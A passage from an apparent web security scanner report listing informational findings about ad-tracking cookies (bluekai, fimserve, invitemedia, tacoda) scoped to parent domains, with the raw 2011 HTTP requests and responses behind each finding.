User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:06 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:06 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:06 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955426^1304957226|18181^1304955426^1304957226; path=/; expires=Mon, 09-May-11 16:07:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

10.52. http://tags.bluekai.com/site/3775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3775

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3775 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bk=uBEq2hA+ZqtVIHOf; bkc=KJh56paGANWxOdedub/huuDjavsSYO3E/WaGi9VqJqsEyIzih9ymDgJ6n2avCWQqiATsQGVYz2GsTC9HOhrSGmeQbY9/xStiQtYVk7u35NdpArdKXwchQf+f22b2ayTYqfTo4wJ2+Ou91wZNTULKMwlmelCbyWSMRf7QugeUnAkpFcSElsTeiDNt/XfmPvD8UM+0siCzDjC0IsX1yC0FlSmZUA6eNAcUzrBmiB60pwcS3yaQIa1CkwhQfT42t0+2Zpb7mPXfHwlKgxcjOIX+e2hr5+by+0G2z6SSbtkl0xWbplA0Nt47u2/zgXl8C5abf1GDWnZGzJwt5y/jtXUcWmjXfH5rTBWzLaErtF7LyxloUTjgL2nweUB2fuBSfNj5TD+p5Iyn2bPpNbu7T2/f1K7wDuwdvRH84KN7BvXOpqmIlba87fU2ppecS8d09UtSPfcjL4wjE6guazmzg8ti2facf0Vdw4alyh0FFDQKfikzeljGdLotf/46jzBUSj8mr8SkdxIkd0h/7pX7p4NGVlxKChbaqwYTwlR3YVcfFGfLGdKl7kjGqf65rhIP8FATp47SJXZ+kyoBCXrsbIZJ4UE452zCUa0HpkVAIKIL2pD3blBdE7BdtFXO6GR1X9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:47 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=HEYMqHA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566a/PaWDOredpApS3eZpu9Jn98NsYHWuYX3BN3gaz0B1nk3WeWEfD9reiHnHkzvxWnutZgeaHnuG6jWYaIN3WxCu35xi0WNC3pgd0ImXzhKwhy477cFrw4KrB9wU7pkXuvTceLYvKn9HhkzEBqKkQJK4c58cd1/pT2VFsTeWsFOy3HnWWmrZjp3LsSXriz+kGwLhF5Hae6hq1Nf54QxRwKUxawswn/yjgNbEoobl9LcFSCecuJoK2LhT2U68ifN+ClEwrl9d2n5bbtc8GZSImil2UkZx18NTs0xxM218pdUENZKmVgmKriorkwmXJsj2mM5rpUQNX64lNb1nEDefuRKnLg2es9i5FyBM83L4h/cqaTYqD2Dy72T2qflMKKsz2qh7Nk4dk4Drah6IkPRw4mvS2PYF5VrU2jrL2zK1kpXnRbbF7oB8fzGXifX31rIV6eX21N82m9kL0gp0oD3RE2X5+08TjgbbE2fckg0UlBmSFlCZFw3sKsdnTV03/FBlGqB4gEL278j8HCtfj56yS4N2pwgT1VFtGyfAwwTAc9jEddrMIloQcBfU4u4kdultm8u4FegyjLSSXTZSIKGbX4/MCNnWD8bndED78qbFnL/T4X2b3seB4fEKHLqVjl2HLpdNwtTMary=; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:47 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

10.53. http://tags.bluekai.com/site/3869  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3869

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3869 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bk=rWh9VOA+ZqtVIHOf; bkc=KJh56XXgHaWDOdeF7HAdhG2Za3xxhHiuavsyXVBkXVpDLnYxjZ1FFhGNxZJaEju02r1Pi2kR1O7hcNQGJE2MG5QxvX88UwwmUqhK72f877F4md4jKD90Y5E+oYyw+Z++zrKi2n9FTToYRvCsGzekkpYWrPffP9WcoReNAqSXs9i02yNpF4jYwFe8GOOLmn4GW5Cwm5n25n7BKK6QfU5yeKiSwnBXXcgjWz18i2JBH5nzEp+BpMXaKL7z7htjAmjbqzTwdSlcMCz9ajDvw4HIVKC6cJta1mKNNfl9E9zycALfK4jqrduMTqDtbPUeladfZ2qgu0Czti4dnCIHfZbDn3tPwQ8nUTu1devWKUl+ajgUsX6pXjbiKHzf4MU125384rYS8CVND6bKwEzCcE41KKlZ9cOdGhej0dMV1B5gc2cX4eEFpV6IF8Tb2kvPBB5gMNcIXNbCBjYiXbn9e+2JPhrrodZffjZVporu4CbPnirH8FNGVdE2F7yvURc42tWlB6eRm52d2+wdr+siABy2dw5NuJg7bEq7+qwJINLv+LLhyTZVMwl6dDTt/O05kIbmudw5lKX3JwFpd+pZdV7d91QM9hX=; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:40 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 15:35:40 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=uBEq2hA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56paGANWxOdedub/huuDjavsSYO3E/WaGi9VqJqsEyIzih9ymDgJ6n2avCWQqiATsQGVYz2GsTC9HOhrSGmeQbY9/xStiQtYVk7u35NdpArdKXwchQf+f22b2ayTYqfTo4wJ2+Ou91wZNTULKMwlmelCbyWSMRf7QugeUnAkpFcSElsTeiDNt/XfmPvD8UM+0siCzDjC0IsX1yC0FlSmZUA6eNAcUzrBmiB60pwcS3yaQIa1CkwhQfT42t0+2Zpb7mPXfHwlKgxcjOIX+e2hr5+by+0G2z6SSbtkl0xWbplA0Nt47u2/zgXl8C5abf1GDWnZGzJwt5y/jtXUcWmjXfH5rTBWzLaErtF7LyxloUTjgL2nweUB2fuBSfNj5TD+p5Iyn2bPpNbu7T2/f1K7wDuwdvRH84KN7BvXOpqmIlba87fU2ppecS8d09UtSPfcjL4wjE6guazmzg8ti2facf0Vdw4alyh0FFDQKfikzeljGdLotf/46jzBUSj8mr8SkdxIkd0h/7pX7p4NGVlxKChbaqwYTwlR3YVcfFGfLGdKl7kjGqf65rhIP8FATp47SJXZ+kyoBCXrsbIZJ4UE452zCUa0HpkVAIKIL2pD3blBdE7BdtFXO6GR1X9==; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:40 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

10.54. http://trgc.opt.fimserve.com/fp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgc.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=738-002553&rnd=555853643077 HTTP/1.1
Host: trgc.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

10.55. http://trgca.opt.fimserve.com/fp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

10.56. http://va.px.invitemedia.com/adnxs_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /adnxs_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 15:36:52 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1304955432+ \"5056308203649640923\"+ 4451+ 6017+ 2]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuFYeZZVgElixZQF71gUGDVetCx8x2LAaAHmc0lwXPnMApR9OgEky6DBAJQBs7lkOC58YALKPAbLMGnc2bwUqI/J4g5U9vs3ZgFGif/P5oNN/X8cYiqYD5SdfQMk+xwq2z5/AVgWzOcS4bh3AOSiLRd+vYXYyWDBABR9BXbJs0U/UERXzGcFmjS57zSK6M77IPNnzV+LEAUAeCtQJA=="; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEue4GiHAJLFiyoJ3LAoMGgwGjBZgNpc4x/FAARaJpxMQEmA2UGK3NVDHY7gEk8UdqMQCF6DE/2fz4RLPQWwuYY71rkCJLRd+vYVIMFgwAAW3hQowSkzuO40iuNcFKDhr/lqEIAArXi/T"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.57. http://www.groupon.com/dallas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /dallas/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
